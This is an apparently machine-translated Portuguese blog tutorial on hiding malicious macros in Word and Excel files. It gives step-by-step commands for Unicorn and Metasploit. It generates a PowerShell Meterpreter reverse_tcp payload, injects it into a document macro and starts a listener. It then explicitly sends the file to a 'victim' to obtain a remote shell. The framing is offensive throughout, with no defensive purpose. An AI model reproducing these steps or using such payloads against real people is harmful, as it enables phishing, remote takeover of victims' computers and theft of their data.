Injetar códigos maliciosos em documentos do Word e Excel


Existem diferentes métodos para esconder códigos maliciosos em documentos do Word ou Excel, neste caso Unicorn é usado porque ele é uma ferramenta simples de usar um ataque com PowerShell e injetar código shell diretamente na memória. Baseia-se em ataques PowerShell Matthew Graeber, a técnica de circulação PowerShell apresentado por David Kennedy TrustedSec e Josh Kelly . Esta ferramenta permite a criação de diferentes tipos de arquivos a ser executado na máquina da vítima serão obtidos como resultado, uma sessão remota no computador para executar uma série de comandos.
A ferramenta é liberado para os repositórios GitHub  você vai aprender a criar um arquivo Word ou Excel com uma macro maliciosa para ser executado pelo alvo resultará uma sessão remota no computador.

Download Link: https://github.com/trustedsec/unicorn.git

1. Baixar a ferramenta para repositórios clone em  Kali Linux com os seguintes comandos no terminal:
git clone https://github.com/trustedsec/unicorn.git

 2. Uma vez clonado o repositório, um nome de pasta é criada automaticamente Unicorn; para ver o que está contido no arquivo em questão deve digitar o seguinte comando no console:
Nota: Sempre que o unicórnio comando cd permite-nos para entrar nas ls pasta unicórnio e nos permite listar o conteúdo do arquivo.
cd unicorn
ls
 Com o comando ./unicorn.py ou python unicorn.py começará a ferramenta unicórnio para ver as configurações que são exibidas.
3. Inicie a ferramenta, um menu deve aparecer como mostrado na tela a seguir, em que explica a sintaxe dos comandos deve tipiar para configurar a explorar com sucesso. Neste caso, você irá criar um arquivo txt com o código para ser injetado no documento pela primeira vez executado no sistema voltamos uma sessão remota com o seguinte comando:

python unicorn.py windows / meterpreter / reverse_tcp macro 192.168.0.110  4444


4. Após o shellcode carga gerada dois arquivos são criados na pasta com o nome do unicórnio powershell_attack.txt e unicorn.rc , o powershell_attack contém o código para ser injetado no documento do Word ou Excel através de uma macro e o arquivo unicorn.rc gerar uma sessão de audição automaticamente.

5. Em seguida, o arquivo será aberto powershell_attack.txt para verificar e modificar o seu conteúdo depois injetá-lo em uma macro com o seguinte comando:

nano powershell_attack.txt
                                   
6. Dentro do erro mensage do documento que aparece a vítima na linha referente a msg ser alterado.

7. Agora, iremos para uma máquina Windows para injetar o código em um macro de um documento do Word e o código que vem em serão copiados powershell_attack.txt no arquivo de macro.

8. Uma vez que o documento for salvo será passado para configurar a sessão de escuta em meterpreter é por isso que temos de começar do banco de dados metasploit

service postgresql start
msfdb init
msfclonsole 
 


10. sessão meterpreter com os seguintes comandos serão definidos:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.122  : Este é o endereço IP do nosso kali Linux.
set lport 4444 : está é a porta que configurou
exploit


 11. Finalmente, o arquivo será enviado para a vítima para executá-lo e por isso pode permitir que o meterpreter inicie sessão para inserir comandos remotos.

 abaixo documento pronto para enviar para vitima
resultado scanner documento: Aqui
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...